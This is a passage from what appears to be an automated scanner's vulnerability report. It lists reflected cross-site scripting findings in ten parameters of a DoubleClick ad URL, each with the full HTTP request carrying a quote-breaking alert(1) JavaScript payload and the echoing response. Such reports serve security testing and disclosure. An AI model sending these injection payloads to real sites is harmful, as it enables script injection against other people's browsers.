GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=1267d"-alert(1)-"12cea1025ac&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:43:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=1267d"-alert(1)-"12cea1025ac&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/a
...[SNIP]...

3.275. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd0f1"-alert(1)-"dab6fa02c58 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=dd0f1"-alert(1)-"dab6fa02c58&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:43:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=dd0f1"-alert(1)-"dab6fa02c58&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUr
...[SNIP]...

3.276. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27dc1"-alert(1)-"792d2569e8e was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=27dc1"-alert(1)-"792d2569e8e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6515
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:45:46 GMT
Expires: Wed, 27 Apr 2011 23:45:46 GMT



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=27dc1"-alert(1)-"792d2569e8ehttp://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

3.277. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ef25"-alert(1)-"e7c4b8c6009 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn2ef25"-alert(1)-"e7c4b8c6009&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn2ef25"-alert(1)-"e7c4b8c6009&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg
...[SNIP]...

3.278. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32a82"-alert(1)-"74f415d259d was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US32a82"-alert(1)-"74f415d259d&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
et/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US32a82"-alert(1)-"74f415d259d&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23
...[SNIP]...

3.279. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2ad4"-alert(1)-"5295ce4effe was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=e2ad4"-alert(1)-"5295ce4effe&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=e2ad4"-alert(1)-"5295ce4effe&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http:
...[SNIP]...

3.280. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8c42"-alert(1)-"ed79a83044f was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253ac8c42"-alert(1)-"ed79a83044f&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
ttp://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253ac8c42"-alert(1)-"ed79a83044f&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.2
...[SNIP]...

3.281. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 824d1"-alert(1)-"7dcf3885d8a was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=824d1"-alert(1)-"7dcf3885d8a&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:43:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=824d1"-alert(1)-"7dcf3885d8a&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
...[SNIP]...

3.282. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e59bb"-alert(1)-"748ff10e818 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.come59bb"-alert(1)-"748ff10e818&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:43:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.come59bb"-alert(1)-"748ff10e818&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fsc
...[SNIP]...

3.283. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b86ab"-alert(1)-"b7c685bfb49 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2b86ab"-alert(1)-"b7c685bfb49&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2b86ab"-alert(1)-"b7c685bfb49&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=
...[SNIP]...

3.284. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b163"-alert(1)-"c8130219e41 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com6b163"-alert(1)-"c8130219e41&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:44:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com6b163"-alert(1)-"c8130219e41&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmo
...[SNIP]...

3.285. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

